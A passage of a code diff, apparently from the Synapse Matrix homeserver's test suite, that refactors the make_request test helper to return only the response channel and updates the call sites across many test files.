" \"POST\",", - "@@ -63,3 +63,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " self.hs.is_mine = lambda target_user: False", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -81,3 +81,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " filter_id = filter_id.result", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/user/%s/filter/%s\" % (self.user_id, filter_id)", - "@@ -89,3 +89,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_get_filter_non_existant(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/user/%s/filter/12382148321\" % (self.user_id)", - "@@ -99,3 +99,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_get_filter_invalid_id(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/user/%s/filter/foobar\" % (self.user_id)", - "@@ -107,3 +107,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_get_filter_no_id(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/user/%s/filter/\" % (self.user_id)", - "diff --git a/tests/rest/client/v2_alpha/test_password_policy.py b/tests/rest/client/v2_alpha/test_password_policy.py", - "index ee86b9491..fba34def3 100644", - "--- a/tests/rest/client/v2_alpha/test_password_policy.py", - "+++ b/tests/rest/client/v2_alpha/test_password_policy.py", - "@@ -72,5 +72,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", \"/_matrix/client/r0/password_policy\"", - "- )", - "+ channel = self.make_request(\"GET\", \"/_matrix/client/r0/password_policy\")", - "@@ -91,3 +89,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"shorty\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -100,3 +98,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"longerpassword\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -109,3 +107,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"l0ngerpassword\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -118,3 +116,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"l0ngerpassword!\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -127,3 +125,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"L0NGERPASSWORD!\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -136,3 +134,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"L0ngerpassword!\"})", - "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", - "+ channel = self.make_request(\"POST\", self.register_url, request_data)", - "@@ -162,3 +160,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "diff --git a/tests/rest/client/v2_alpha/test_register.py b/tests/rest/client/v2_alpha/test_register.py", - "index 4bf3e0d63..27db4f551 100644", - "--- a/tests/rest/client/v2_alpha/test_register.py", - "+++ b/tests/rest/client/v2_alpha/test_register.py", - "@@ -63,3 +63,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", self.url + b\"?access_token=i_am_an_app_service\", request_data", - "@@ -74,3 +74,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\"})", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", self.url + b\"?access_token=i_am_an_app_service\", request_data", - "@@ -82,3 +82,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": 666})", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -89,3 +89,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": 777, \"password\": \"monkey\"})", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -104,3 +104,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(params)", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -119,3 +119,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -129,3 +129,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "@@ -138,3 +138,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "@@ -147,3 +147,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " url = self.url + b\"?kind=guest\"", - "- request, channel = self.make_request(b\"POST\", url, b\"{}\")", - "+ channel = self.make_request(b\"POST\", url, b\"{}\")", - "@@ -157,3 +157,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "@@ -171,3 +171,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(params)", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -181,3 +181,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", - "@@ -186,3 +186,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " def test_advertised_flows(self):", - "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", - " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", - "@@ -209,3 +209,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " def test_advertised_flows_captcha_and_terms_and_3pids(self):", - "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", - " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", - "@@ -241,3 +241,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - " def test_advertised_flows_no_msisdn_email_required(self):", - "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", - " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", - "@@ -281,3 +281,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -320,3 +320,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " # endpoint.", - "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "@@ -326,3 +326,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "@@ -348,5 +348,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(params)", - "- request, channel = self.make_request(", - "- b\"POST\", url, request_data, access_token=admin_tok", - "- )", - "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -355,3 +353,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " # endpoint.", - "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -372,5 +370,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(params)", - "- request, channel = self.make_request(", - "- b\"POST\", url, request_data, access_token=admin_tok", - "- )", - "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -379,3 +375,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " # endpoint.", - "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"403\", channel.result)", - "@@ -399,5 +395,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(params)", - "- request, channel = self.make_request(", - "- b\"POST\", url, request_data, access_token=admin_tok", - "- )", - "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -405,3 +399,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " # Try to log the user out", - "- request, channel = self.make_request(b\"POST\", \"/logout\", access_token=tok)", - "+ channel = self.make_request(b\"POST\", \"/logout\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -412,3 +406,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", - " # Try to log out all of the user's sessions", - "- request, channel = self.make_request(b\"POST\", \"/logout/all\", access_token=tok)", - "+ channel = self.make_request(b\"POST\", \"/logout/all\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -486,3 +480,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " url = \"/_matrix/client/unstable/account_validity/renew?token=%s\" % renewal_token", - "- request, channel = self.make_request(b\"GET\", url)", - "+ channel = self.make_request(b\"GET\", url)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -506,3 +500,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " self.reactor.advance(datetime.timedelta(days=3).total_seconds())", - "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -513,3 +507,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " url = \"/_matrix/client/unstable/account_validity/renew?token=123\"", - "- request, channel = self.make_request(b\"GET\", url)", - "+ channel = self.make_request(b\"GET\", url)", - " self.assertEquals(channel.result[\"code\"], b\"404\", channel.result)", - "@@ -534,3 +528,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " (user_id, tok) = self.create_user()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\",", - "@@ -558,3 +552,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"account/deactivate\", request_data, access_token=tok", - "@@ -609,3 +603,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", - " # Test that we're still able to manually trigger a mail to be sent.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\",", - "diff --git a/tests/rest/client/v2_alpha/test_relations.py b/tests/rest/client/v2_alpha/test_relations.py", - "index 6cd4eb662..bd574077e 100644", - "--- a/tests/rest/client/v2_alpha/test_relations.py", - "+++ b/tests/rest/client/v2_alpha/test_relations.py", - "@@ -62,3 +62,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -109,3 +109,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -154,3 +154,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -212,3 +212,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -281,3 +281,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -327,3 +327,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -359,3 +359,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Now lets redact one of the 'a' reactions", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -367,3 +367,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -384,3 +384,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -416,3 +416,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -452,3 +452,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -509,3 +509,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -551,3 +551,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Check the relation is returned", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -563,3 +563,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Redact the original event", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -573,3 +573,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Try to check for remaining m.replace relations", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -600,3 +600,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Redact the original", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -614,3 +614,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - " # Check that aggregations returns zero", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -658,3 +658,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "diff --git a/tests/rest/client/v2_alpha/test_shared_rooms.py b/tests/rest/client/v2_alpha/test_shared_rooms.py", - "index 05c5ee5a7..116ace181 100644", - "--- a/tests/rest/client/v2_alpha/test_shared_rooms.py", - "+++ b/tests/rest/client/v2_alpha/test_shared_rooms.py", - "@@ -44,3 +44,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - " def _get_shared_rooms(self, token, other_user) -> FakeChannel:", - "- _, channel = self.make_request(", - "+ return self.make_request(", - " \"GET\",", - "@@ -50,3 +50,2 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - " )", - "- return channel", - "diff --git a/tests/rest/client/v2_alpha/test_sync.py b/tests/rest/client/v2_alpha/test_sync.py", - "index 31ac0fccb..512e36c23 100644", - "--- a/tests/rest/client/v2_alpha/test_sync.py", - "+++ b/tests/rest/client/v2_alpha/test_sync.py", - "@@ -37,3 +37,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_sync_argless(self):", - "- request, channel = self.make_request(\"GET\", \"/sync\")", - "+ channel = self.make_request(\"GET\", \"/sync\")", - "@@ -57,3 +57,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/sync\")", - "+ channel = self.make_request(\"GET\", \"/sync\")", - "@@ -196,3 +196,3 @@ class SyncFilterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/sync?filter=%s\" % sync_filter, access_token=tok", - "@@ -247,3 +247,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - " # Start typing.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -254,5 +254,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", \"/sync?access_token=%s\" % (access_token,)", - "- )", - "+ channel = self.make_request(\"GET\", \"/sync?access_token=%s\" % (access_token,))", - " self.assertEquals(200, channel.code)", - "@@ -261,3 +259,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - " # Stop typing.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -269,3 +267,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - " # Start typing.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -277,5 +275,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - " # Should return immediately", - "- request, channel = self.make_request(", - "- \"GET\", sync_url % (access_token, next_batch)", - "- )", - "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", - " self.assertEquals(200, channel.code)", - "@@ -291,5 +287,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", sync_url % (access_token, next_batch)", - "- )", - "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", - " self.assertEquals(200, channel.code)", - "@@ -301,5 +295,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", - " # stream token.", - "- request, channel = self.make_request(", - "- \"GET\", sync_url % (access_token, next_batch)", - "- )", - "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", - " self.assertEquals(200, channel.code)", - "@@ -385,3 +377,3 @@ class UnreadMessagesTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"m.read\": res[\"event_id\"]}).encode(\"utf8\")", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -452,3 +444,3 @@ class UnreadMessagesTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url % self.next_batch, access_token=self.tok,", - "diff --git a/tests/rest/media/v1/test_media_storage.py b/tests/rest/media/v1/test_media_storage.py", - "index 6f0677d33..ae2b32b13 100644", - "--- a/tests/rest/media/v1/test_media_storage.py", - "+++ b/tests/rest/media/v1/test_media_storage.py", - "@@ -230,3 +230,3 @@ class MediaRepoTests(unittest.HomeserverTestCase):", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -326,3 +326,3 @@ class MediaRepoTests(unittest.HomeserverTestCase):", - " params = \"?width=32&height=32&method=\" + method", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/rest/media/v1/test_url_preview.py b/tests/rest/media/v1/test_url_preview.py", - "index 529b6bcde..83d728b4a 100644", - "--- a/tests/rest/media/v1/test_url_preview.py", - "+++ b/tests/rest/media/v1/test_url_preview.py", - "@@ -115,3 +115,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -140,3 +140,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " # Check the cache returns the correct response", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://matrix.org\", shorthand=False", - "@@ -156,3 +156,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " # Check the database cache returns the correct response", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://matrix.org\", shorthand=False", - "@@ -177,3 +177,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -212,3 +212,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -247,3 +247,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -280,3 +280,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -310,3 +310,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -331,3 +331,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -348,3 +348,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://192.168.1.1\", shorthand=False", - "@@ -367,3 +367,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://1.1.1.2\", shorthand=False", - "@@ -387,3 +387,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -424,3 +424,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -444,3 +444,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -465,3 +465,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -482,3 +482,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"OPTIONS\", \"preview_url?url=http://example.com\", shorthand=False", - "@@ -495,3 +495,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - " # Build and make a request to the server", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -569,3 +569,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -634,3 +634,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "diff --git a/tests/rest/test_health.py b/tests/rest/test_health.py", - "index aaf2fb821..32acd93dc 100644", - "--- a/tests/rest/test_health.py", - "+++ b/tests/rest/test_health.py", - "@@ -27,3 +27,3 @@ class HealthCheckTests(unittest.HomeserverTestCase):", - " def test_health(self):", - "- request, channel = self.make_request(\"GET\", \"/health\", shorthand=False)", - "+ channel = self.make_request(\"GET\", \"/health\", shorthand=False)", - "diff --git a/tests/rest/test_well_known.py b/tests/rest/test_well_known.py", - "index 17ded96b9..14de0921b 100644", - "--- a/tests/rest/test_well_known.py", - "+++ b/tests/rest/test_well_known.py", - "@@ -30,3 +30,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/.well-known/matrix/client\", shorthand=False", - "@@ -46,3 +46,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/.well-known/matrix/client\", shorthand=False", - "diff --git a/tests/server.py b/tests/server.py", - "index 4faf32e33..7d1ad362c 100644", - "--- a/tests/server.py", - "+++ b/tests/server.py", - "@@ -176,3 +176,3 @@ def make_request(", - " ] = None,", - "-):", - "+) -> FakeChannel:", - " \"\"\"", - "@@ -180,3 +180,3 @@ def make_request(", - "- Returns the Request and the Channel underneath.", - "+ Returns the fake Channel object which records the response to the request.", - "@@ -204,3 +204,3 @@ def make_request(", - " Returns:", - "- Tuple[synapse.http.site.SynapseRequest, channel]", - "+ channel", - " \"\"\"", - "@@ -267,3 +267,3 @@ def make_request(", - "- return req, channel", - "+ return channel", - "diff --git a/tests/server_notices/test_consent.py b/tests/server_notices/test_consent.py", - "index e0a9cd93a..4dd5a3617 100644", - "--- a/tests/server_notices/test_consent.py", - "+++ b/tests/server_notices/test_consent.py", - "@@ -72,3 +72,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", - " # Initial sync, to get the user consent room invite", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/sync\", access_token=self.access_token", - "@@ -81,3 +81,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", - " # Join the room", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -89,3 +89,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", - " # Sync again, to get the message in the room", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/sync\", access_token=self.access_token", - "diff --git a/tests/server_notices/test_resource_limits_server_notices.py b/tests/server_notices/test_resource_limits_server_notices.py", - "index 9c8027a5b..fea54464a 100644", - "--- a/tests/server_notices/test_resource_limits_server_notices.py", - "+++ b/tests/server_notices/test_resource_limits_server_notices.py", - "@@ -307,3 +307,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", - "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", - "@@ -320,3 +320,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", - " # room has a notice in it.", - "- request, channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", - "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", - "@@ -355,5 +355,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", - " # Sync with the user's token to mark the user as active.", - "- request, channel = self.make_request(", - "- \"GET\", \"/sync?timeout=0\", access_token=tok,", - "- )", - "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok,)", - "diff --git a/tests/test_mau.py b/tests/test_mau.py", - "index c5ec6396a..02e56e1b0 100644", - "--- a/tests/test_mau.py", - "+++ b/tests/test_mau.py", - "@@ -203,3 +203,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"POST\", \"/register\", request_data)", - "+ channel = self.make_request(\"POST\", \"/register\", request_data)", - "@@ -215,3 +215,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", - " def do_sync_for_user(self, token):", - "- request, channel = self.make_request(\"GET\", \"/sync\", access_token=token)", - "+ channel = self.make_request(\"GET\", \"/sync\", access_token=token)", - "diff --git a/tests/test_server.py b/tests/test_server.py", - "index 0be8c7e2f..815da18e6 100644", - "--- a/tests/test_server.py", - "+++ b/tests/test_server.py", - "@@ -86,3 +86,3 @@ class JsonResourceTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "@@ -110,3 +110,3 @@ class JsonResourceTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "@@ -128,3 +128,3 @@ class JsonResourceTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", - "@@ -150,5 +150,3 @@ class JsonResourceTests(unittest.TestCase):", - "- _, channel = make_request(", - "- self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foobar\"", - "- )", - "+ 